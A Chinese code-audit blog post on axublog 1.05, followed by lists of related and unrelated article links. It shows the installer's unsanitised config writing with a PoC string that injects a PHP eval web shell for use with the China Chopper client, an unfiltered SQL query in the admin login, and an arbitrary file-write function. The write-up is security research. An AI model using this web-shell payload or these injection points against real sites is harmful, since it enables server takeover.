00x1 安装漏洞

  install/cmsconfig.php

 function step4(){

 $root=$_POST["root"];

 $dbuser=$_POST["dbuser"];

 $dbpsw=$_POST["dbpsw"];

 $dbname=$_POST["dbname"];

 $tabhead=$_POST["tabhead"];

 $ad_user=$_POST["ad_user"];

 $ad_psw=$_POST["ad_psw"];

 $webname=$_POST["webname"];

 $weburl=$_POST["weburl"];

 $webinfo=$_POST["webinfo"];

 $webkeywords=$_POST["webkeywords"];

 $webauthor=$_POST["webauthor"];

这几个都是可控的,并没有进行任何处理。然后传到了$text2,然后又写到了cmsconfig.php当中。

 $file="config_empty.php";

 $fp=fopen($file,"r"); //以写入方式打开文件

 $text2=fread($fp,4096); //读取文件内容

 $text2=str_replace('@root@',$root,$text2);

 $text2=str_replace('@dbuser@',$dbuser,$text2);

 $text2=str_replace('@dbpsw@',$dbpsw,$text2);

 $text2=str_replace('@dbname@',$dbname,$text2);

 $text2=str_replace('@tabhead@',$tabhead,$text2);

 $text2=str_replace('@webname@',$webname,$text2);

 $text2=str_replace('@weburl@',$weburl,$text2);

 $text2=str_replace('@webinfo@',$webinfo,$text2);

 $text2=str_replace('@webkeywords@',$webkeywords,$text2);

 $text2=str_replace('@webauthor@',$webauthor,$text2);

 $file="../cmsconfig.php"; //定义文件

 $fp=fopen($file,"w"); //以写入方式打开文件

 fwrite($fp,$text2);

 @unlink("goinstall.php");

这个漏洞比较简单,直接在配置信息中填写一句话闭合就可以getshell了。

POC:"@eval($_POST['xishaonian'])

然后菜刀直接连接就cmsconfig.php即可。

注:该漏洞也在后台直接可以插一句话

 00x2 SQL注入

ad/admin.php

 chkoutpost();

 $ad_user=$_POST["ad_user"];

 $ad_psw=$_POST["ad_psw"];$ad_psw = authcode(@$ad_psw, 'ENCODE', 'key',);

 global $tabhead;

 $tab=$tabhead."adusers";

 mysql_select_db($tab);

 $sql = mysql_query("select * from ".$tab." where adnaa='".$ad_user."'");

很简答可以看到$ad_user没有过滤。直接性导致sql注入。

00x3

 <?php

 function edit2save(){

 global $themepath;

 ?>

 <div class="yj_green" id=full>

 <b class="b1"></b><b class="b2"></b><b class="b3"></b><b class="b4"></b>

 <div class="boxcontent">

 <h2><a href="?">主题管理</a> > <a href="javascript:history.go(-2)">编辑主题</a> > 编辑文件 > <a href="javascript:history.back()">返回</a></h2>

 </div>

 <div class="t1"><div class="t2">

 <?php

 $path=$_REQUEST['path'];

 $content=stripslashes($_REQUEST['content']);

 ?>

 <p>编辑文件:<?=$path?></p>

 <?php

 if($path==''){echo'文件路径错误!';exit;}

 if(file_put_contents ($path, $content)){echo"保存文件成功!";}

 else{echo"保存文件失败!";}

 ?>

 </div></div>

 <b class="b4b"></b><b class="b3b"></b><b class="b2b"></b><b class="b1b"></b>

 </div>

axublog 1.05代码审计的更多相关文章

  1. PHP代码审计05之正则使用不当

    前言 根据红日安全写的文章,学习PHP代码审计的第五节内容,题目均来自PHP SECURITY CALENDAR 2017,讲完题目会用一道CTF的题目和实例来加深巩固.这是之前写的,有兴趣可以去看看 ...

  2. auxblogcms1.0.6|代码审计

    这周的审计任务,两天前的任务呀~拖延症呀~ 这次审计一个博客----auxblogcms1.0.6,网上也有所记载,我下面会做个总结. axublog是一款php个人博客系统,小巧强大的PHP+MyS ...

  3. 代码审计之XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)

    0x00 前言 这段时间就一直在搞代码审计了.针对自己的审计方法做一下总结,记录一下步骤. 审计没他,基础要牢,思路要清晰,姿势要多且正. 下面是自己审计的步骤,正在逐步调整,寻求效率最高. 0x01 ...

  4. axublogcms1.0.6|代码审计

    这周的审计任务,两天前的任务呀~拖延症呀~ 这次审计一个博客----auxblogcms1.0.6,网上也有所记载,我下面会做个总结. axublog是一款php个人博客系统,小巧强大的PHP+MyS ...

  5. [代码审计]XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)

    0x00 前言 这段时间就一直在搞代码审计了.针对自己的审计方法做一下总结,记录一下步骤. 审计没他,基础要牢,思路要清晰,姿势要多且正. 下面是自己审计的步骤,正在逐步调整,寻求效率最高. 0x01 ...

  6. PHP代码审计基础-初级篇

    对于php代码审计我也是从0开始学的,对学习过程进行整理输出沉淀如有不足欢迎提出共勉.对学习能力有较高要求,整个系列主要是在工作中快速精通php代码审计,整个学习周期5天 ,建议花一天时间熟悉php语 ...

  7. ESPCMS-Seay自动加手工代码审计

    ESPcms代码审计 源码下载地址:http://yesky.91speed.org.cn/sw/180001_190000/rar/espcms_utf8_5.4.12.05.14.rar 1.自动 ...

  8. 代码审计系列题目CTFD部署(上)

    关于简单部署题目请参考:https://www.cnblogs.com/Cl0ud/p/13783325.html 如果需要进行较复杂部署,可参考本篇 PHP代码审计系列题目的部署,较之前的部署方案, ...

  9. 代码审计【根据功能点定向审计】BugFree ZSWin重装案例

    (哦对了!这些CMS代码不要安装在服务器上,先不说它们用来代码审计本身就是有漏洞的,而且在网上下载下来,也不能保证没有源码是否被篡改而留有后门,就安装在本地进行代码审计的练习即可) 我们先下载BugF ...

随机推荐

  1. 搞不懂为什么开发人员爱iOS恨Android?

    导读:很多网站发表文章大同小异.唯有这个不同点,给大家分享. Android和iOS的较量一直都是人们津津乐道的话题.两个平台各有各的优势所在,同时也都力图能在各个方面赶超对手.对于用户来说,青菜萝卜 ...

  2. 【java】深入了解JAVA可变长度的参数

    到J2SE 1.4为止,一直无法在Java程序里定义实参个数可变的方法——因为Java要求实参(Arguments)和形参(Parameters)的数量和类型都必须逐一匹配,而形参的数目是在定义方法时 ...

  3. stm32开发 - 远离 Keil uVision, 回到 Visual Studio

    学了8051单片机, 学了MSP430系列, 终于开始步入正轨, 开始学习 stm32(ARM Cortex-M3)系列微处理器~ 学51用Keil uVision开发环境, 提一下Keil uVis ...

  4. MongoDB 学习笔记(8)---$type 操作符

    $type操作符是基于BSON类型来检索集合中匹配的数据类型,并返回结果. MongoDB 中可以使用的类型如下表所示: 类型 数字 备注 Double 1   String 2   Object 3 ...

  5. asp.net 浏览器下载文件的四种方式

    // 方法一:TransmitFile实现下载 protected void Button1_Click(object sender, EventArgs e) { Response.ContentT ...

  6. django session入门详解

    概括性的讲: 1.django默认是打开对session的支持的 2.默认情况下session相关的数据会保存在数据库中.浏览器端只保存了session id session 的科普: 1.动态网站中 ...

  7. 如何不使用Navigator空间实现跳转页面?

    //引入 Loading页面 主页面 登录页等页面组件 constructor(props) { super(props); this.state = { 登录状态: 等待检查 }; } compon ...

  8. elasticsearch 性能监控基础

    一.Elasticsearch 是什么 Elasticsearch是一款用Java编写的开源分布式文档存储和搜索引擎,可以用于near real-time存储和数据检索. 1.Elasticsearc ...

  9. jumpserver 3.2修改排序规则

    在默认的情况下,我们使用jumpserver的时候 这里我使用xshell 客户端连接到堡垒机的时候, 这里我的显示规则是根据IP排序的,但是我这里的服务器的hostname 都是根据场景设置的hos ...

  10. Spring Security教程(八):用户认证流程源码详解

    本篇文章主要围绕下面几个问题来深入源码: 用户认证流程 认证结果如何在多个请求之间共享 获取认证用户信息 一.用户认证流程 上节中提到Spring Security核心就是一系列的过滤器链,当一个请求 ...